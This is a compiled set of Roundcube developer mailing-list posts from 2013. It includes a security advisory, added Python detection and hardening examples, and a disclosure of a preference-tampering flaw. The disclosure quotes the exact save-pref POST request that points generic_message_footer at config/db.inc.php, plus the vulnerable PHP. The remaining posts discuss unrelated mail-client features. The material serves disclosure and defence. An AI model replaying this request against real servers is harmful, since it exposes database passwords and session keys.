After getting reports about a possible vulnerability of Roundcube
which allows an attacker to modify its users' preferences in a way that
he/she can then read files from the server, we now published updated
packages as well as patches that fix this security issue.
Please update all your Roundcube installations with the new versions
(0.9-rc2, 0.8.6, 0.7.4) or patch them with the published patches.
Download the latest version from http://roundcube.net/download
Patch for 0.9.x: http://ow.ly/jtQD0
Patch for 0.8.x: http://ow.ly/jtQHM
Patch for 0.7.x: http://ow.ly/jtQK0
Patch for 0.6: http://ow.ly/jtQNd
In order to find out whether one of your users has vulnerable
preferences, you can run the following query on the Roundcube user
database:
SELECT * FROM users WHERE preferences LIKE '%generic_message_footer%'
If this returns any results, you should at least clear the
'preferences' field of that user entry. Or better: entirely block the
user because he or she most likely tried to exploit your system.
And here's some background about the vulnerability:
http://lists.roundcube.net/pipermail/dev/2013-March/022328.html
Best regards,
Thomas
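As an added example, not part of Thomas's message and not Roundcube's own code, the script below runs the advisory's query against a constructed in-memory stand-in for the Roundcube users table and then decodes each flagged preferences blob, so the report names the footer key and the path that were stored rather than only the row. It assumes that the preferences column holds a PHP serialize()d array (the way rcube_user::save_prefs() stores it); the usernames, rows and paths are constructed sample data.

```python
import sqlite3

# Constructed sample rows in the layout of Roundcube's users table (user_id, username,
# preferences). Assumption: the preferences column holds a PHP serialize()d array, which
# is how rcube_user::save_prefs() stores it. Row 2 carries the tampered footer pref.
SAMPLE_USERS = [
    (1, "alice@example.org", 'a:1:{s:8:"timezone";s:13:"Europe/Berlin";}'),
    (2, "mallory@example.org",
     'a:2:{s:8:"timezone";s:3:"UTC";s:22:"generic_message_footer";s:17:"config/db.inc.php";}'),
    (3, "bob@example.org", 'a:1:{s:11:"prefer_html";b:1;}'),
]

# Both footer keys are file paths in sendmail.inc, and the LIKE query matches both.
FOOTER_KEYS = ("generic_message_footer", "generic_message_footer_html")


def _parse(s: bytes, i: int):
    """Decode one PHP-serialized value at byte offset i; return (value, next offset)."""
    t = s[i:i + 1]
    if t == b"N":                                   # N;
        return None, i + 2
    if t in (b"i", b"b", b"d"):                     # i:42;  b:1;  d:1.5;
        end = s.index(b";", i)
        raw = s[i + 2:end].decode()
        if t == b"i":
            return int(raw), end + 1
        if t == b"b":
            return raw == "1", end + 1
        return float(raw), end + 1
    if t == b"s":                                   # s:LEN:"bytes";  LEN counts bytes
        colon = s.index(b":", i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                           # skip :"
        return s[start:start + length].decode("utf-8"), start + length + 2
    if t == b"a":                                   # a:COUNT:{key;value;...}
        colon = s.index(b":", i + 2)
        count = int(s[i + 2:colon])
        i = colon + 2                               # skip :{
        result = {}
        for _ in range(count):
            key, i = _parse(s, i)
            val, i = _parse(s, i)
            result[key] = val
        return result, i + 1                        # skip }
    raise ValueError(f"unsupported serialized type {t!r} at offset {i}")


def php_unserialize(blob: bytes):
    """Decode the subset of PHP serialize() output that preference arrays use."""
    value, _ = _parse(blob, 0)
    return value


def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for the Roundcube users table, filled with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, preferences TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_suspect_users(conn: sqlite3.Connection) -> list:
    """The advisory's query: every row whose preferences blob mentions generic_message_footer."""
    cur = conn.execute(
        "SELECT user_id, username, preferences FROM users "
        "WHERE preferences LIKE '%generic_message_footer%'"
    )
    return cur.fetchall()


def tampered_footer_prefs(conn: sqlite3.Connection) -> list:
    """Decode each flagged blob and report which footer key was set and to which path."""
    findings = []
    for user_id, username, prefs in find_suspect_users(conn):
        decoded = php_unserialize(prefs.encode("utf-8"))
        for key in FOOTER_KEYS:
            if isinstance(decoded, dict) and key in decoded:
                findings.append((user_id, username, key, decoded[key]))
    return findings


def clear_preferences(conn: sqlite3.Connection, user_id: int) -> None:
    """The advisory's minimum remediation: empty the preferences field of that user."""
    conn.execute("UPDATE users SET preferences = '' WHERE user_id = ?", (user_id,))
    conn.commit()


if __name__ == "__main__":
    db = build_sample_db()
    for finding in tampered_footer_prefs(db):
        print("user %d (%s) set %s = %r" % finding)
    # → user 2 (mallory@example.org) set generic_message_footer = 'config/db.inc.php'
```

Against a real installation, replace build_sample_db() with a connection to the Roundcube database; the query and the decoding are unchanged. Decoding the blob matters because the LIKE match alone does not tell you whether the plain or the HTML footer key was set, nor which file the account was pointed at, and that path is what you want in the incident record before clear_preferences() wipes it.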
The attacker first changes the value of the user preference generic_message_footer to
any file Roundcube is allowed to read (config/db.inc.php,
config/main.inc.php), then sends a message to himself (with the config
file included). This allows viewing the session crypto key and the DB user and password. If
phpmyadmin (mysql) or pgmyadmin (pgsql) is installed at the hosting and sessions
are saved in the DB, the attacker gets users' mail logins and passwords.
Found in a Russian tech blog (http://habrahabr.ru/post/174423/).
------
POST /?_task=settings&_action=save-pref&check_request=&_check_request=
HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail" "Mozilla/5.0
(Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0"
"_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php
------
index.php:
else if ($RCMAIL->action == 'save-pref') {
    include INSTALL_PATH . 'program/steps/utils/save_pref.inc';
}
------
program/steps/utils/save_pref.inc:
// Preference name and value both come straight from the POST body.
$name  = get_input_value('_name', RCUBE_INPUT_POST);
$value = get_input_value('_value', RCUBE_INPUT_POST);

// save preference value (no check on which preference key is being written)
$RCMAIL->user->save_prefs(array($name => $value));   //<--------- rewrite value

// update also session if requested
if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) {
    // Support multidimensional arrays...
    $vars = explode('/', $sessname);
    // ... up to 3 levels
    if (count($vars) == 1)
        $_SESSION[$vars[0]] = $value;
    else if (count($vars) == 2)
        $_SESSION[$vars[0]][$vars[1]] = $value;
    else if (count($vars) == 3)
        $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;
}

$OUTPUT->reset();
$OUTPUT->send();
------
program/steps/mail/sendmail.inc
// generic footer for all messages
// ($CONFIG here already has the user's saved preferences merged over the server config)
if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) {
    $footer = file_get_contents(realpath($CONFIG['generic_message_footer_html']));   //<----- load file from value path
    $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
}
else if (!empty($CONFIG['generic_message_footer'])) {
    $footer = file_get_contents(realpath($CONFIG['generic_message_footer']));   //<----- load file from value path
    $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset);
    if ($isHtml)
        $footer = '<pre>'.$footer.'</pre>';
}
--
Sidlyarenko Sergey
https://github.com/lefoyer
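The two places marked in the excerpts above, the unrestricted write in save_pref.inc and the unrestricted file read in sendmail.inc, are the two checks a hardened handler needs. The Python below is an added model of those checks; it is not Roundcube's code and not the project's actual fix. It shows an allow-list of preference keys that a save-pref action may touch, a config merge that never lets user preferences override file-path keys, and a containment check before a footer file is read. The allow-list entries, the footer directory and the paths used are assumptions made up for the example.

```python
import os

# Preference names an ordinary "save-pref" request may set. Constructed, illustrative
# allow-list; Roundcube's real set of user-settable keys is not on the page.
SAVE_PREF_ALLOWLIST = frozenset({"timezone", "prefer_html", "list_cols", "preview_pane"})

# Config keys whose value names a file on disk. Whatever the user stores in
# preferences, these must come from the server's config only.
PATH_CONFIG_KEYS = frozenset({"generic_message_footer", "generic_message_footer_html"})


class PreferenceRejected(ValueError):
    """Raised when a save-pref request names a key outside the allow-list."""


def save_pref(stored_prefs: dict, name: str, value) -> dict:
    """Allow-listed counterpart of the save_pref.inc step: unknown keys are refused, not stored."""
    if name not in SAVE_PREF_ALLOWLIST:
        raise PreferenceRejected(f"preference {name!r} may not be set via save-pref")
    updated = dict(stored_prefs)
    updated[name] = value
    return updated


def effective_config(server_config: dict, user_prefs: dict) -> dict:
    """Overlay user preferences on the server config, never letting a path-typed key be overridden."""
    merged = dict(server_config)
    for key, value in user_prefs.items():
        if key in PATH_CONFIG_KEYS:
            continue        # keep the server value; a real deployment would also log this
        merged[key] = value
    return merged


def resolve_footer_path(footer_dir: str, configured_path: str) -> str:
    """Resolve the footer file and refuse anything whose real path escapes footer_dir."""
    base = os.path.realpath(footer_dir)
    real = os.path.realpath(os.path.join(base, configured_path))
    if os.path.commonpath([base, real]) != base:
        raise PermissionError(f"footer path {configured_path!r} resolves outside {footer_dir!r}")
    return real


def load_footer(config: dict, footer_dir: str, key: str = "generic_message_footer") -> str:
    """The sendmail.inc file_get_contents step, with the containment check applied first."""
    configured = config.get(key)
    if not configured:
        return ""
    with open(resolve_footer_path(footer_dir, configured), encoding="utf-8") as fh:
        return fh.read()
```

Either of the first two checks alone would have closed the path described in the post: with the allow-list, the footer key never reaches the preferences blob; with the merge filter, a footer key that did reach it is ignored when the config is built. The containment check is the last line of defence for the case where an administrator's own footer setting is wrong, and it is the one to keep regardless of how preferences are handled.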
We're getting ready to roll out Roundcube for our webmail platform and our
testing ran into one issue so far that seems like a good idea to push
upstream. I searched but didn't find any mention of this so please
pardon in advance if this has already been discussed.
One of our testers had an email with a PDF attachment that had a MIME
type of text/plain. Roundcube displays the PDF as text. We tested a
few other clients and it looks like recent versions of Outlook and
Apple Mail display the attachment as a PDF but Thunderbird displays it
as plain text, so it isn't unanimous that a mail client should handle
this either way.
What is Roundcube's opinion on attachments with incorrect MIME types?
There's a pretty good argument that an end user doesn't really care that
whoever sent them an attachment used broken software to do it,
particularly if they use another client that displays it correctly.
--
Kelsey Cummings - kgc(a)corp.sonic.net sonic.net, inc.
System Architect 2260 Apollo Way
707.522.1000 Santa Rosa, CA 95407
Since March 20th, I've not seen any new messages in the SVN list. Although I
know and I can confirm, that there have been commits since then.
Hmm??
Cheers,
--
Michael Heydekamp
Co-Admin freexp.de
Düsseldorf/Germany
There's a question according to http://trac.roundcube.net/ticket/1488783.
There are messages with related images. Normally, they are referenced in
HTML bodies (parts), but not always. So, the question is: should we list
such attachments on attachments list. We have a few possibilities:
1. Do not list any in text and html mode (current situation).
2. List only unreferred in text and html mode.
3. In text mode list all, in HTML mode list unreferred only
(Thunderbird's way).
4. List all in text and html mode (only for completeness, I suppose we
shouldn't ever choose this option).
Implementing this as a user preference would be overcomplicated; we don't
want to make it optional, we should choose one. So, what's your opinion?
For now I have no strong opinion, but I'm somewhere between 1. and 2.
--
Aleksander 'A.L.E.C' Machniak
LAN Management System Developer [http://lms.org.pl]
Roundcube Webmail Developer [http://roundcube.net]
---------------------------------------------------
PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl
According to short discussion in
http://trac.roundcube.net/ticket/1489001 I see that it is possible to
set top-posting with signature below the quote. It sounds confusing and
useless.
Now when we have "When replying" option (reply_mode) I propose to remove
"When replying or forwarding place signature" option (sig_above).
Signature position should be always below the reply text (not the quote)
and reply_mode already defines this position.
reply_mode=0 -> reply below the quote with sig below the reply text
reply_mode=1 -> reply above the quote with sig below the reply text
Any objections?
--
Aleksander 'A.L.E.C' Machniak
LAN Management System Developer [http://lms.org.pl]
Roundcube Webmail Developer [http://roundcube.net]
---------------------------------------------------
PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl
So, now when we have nice HTML/Text switch (ability to toggle between
html and plain text mode of message preview) we need to do something
with "HTML message" attachment on attachments list. It looks redundant,
or at least inconsistent. I see two solutions:
1. Don't add alternative parts to attachments list. I.e. there will be no
"HTML message" on attachments list in case of a message with alternative
parts.
+1 from me.
2. In html mode add text part to attachments list, in text mode add html
part to attachments list.
--
Aleksander 'A.L.E.C' Machniak
LAN Management System Developer [http://lms.org.pl]
Roundcube Webmail Developer [http://roundcube.net]
---------------------------------------------------
PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl
You can check the behavior by clicking Reply All button (not Reply List)
on this message. Example message from our mailing list contains headers:
To: dev(a)lists.roundcube.net
Reply-To: dev(a)lists.roundcube.net
From: original(a)poster.tld
So, current behavior is that you end up with one recipient
dev(a)lists.roundcube.net in To field. Thunderbird for example, will add
original(a)poster.tld in Cc field.
So, the problem is related to Reply-To header handling. Poll:
1. Keep current behavior.
2. If To: and Reply-To: are the same and From: is different - add From:
address to Cc field.
I prefer the current solution (1), because I think that if Reply-To is
defined, the sender's intention is to not receive replies to his From:
address, no matter if Reply, Reply-All or Reply-List is used. I however
understand that a "private reply" to the poster is sometimes wanted.
--
Aleksander 'A.L.E.C' Machniak
LAN Management System Developer [http://lms.org.pl]
Roundcube Webmail Developer [http://roundcube.net]
---------------------------------------------------
PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl
On 03/21/2013 01:40, A.L.E.C wrote:
> According to short discussion in
> http://trac.roundcube.net/ticket/1489001 I see that it is possible to
> set top-posting with signature below the quote. It sounds confusing
> and
> useless.
>
> Now when we have "When replying" option (reply_mode) I propose to
> remove
> "When replying or forwarding place signature" option (sig_above).
> Signature position should be always below the reply text (not the
> quote)
> and reply_mode already defines this position.
>
> reply_mode=0 -> reply below the quote with sig below the reply text
> reply_mode=1 -> reply above the quote with sig below the reply text
>
> Any objections?
My organization (and our users) support this change 100%. Fewer useless
and confusing user options is a good thing.
--
Arne Berglund
System Administrator, Internet Services
Lane Education Service District
Eugene, OR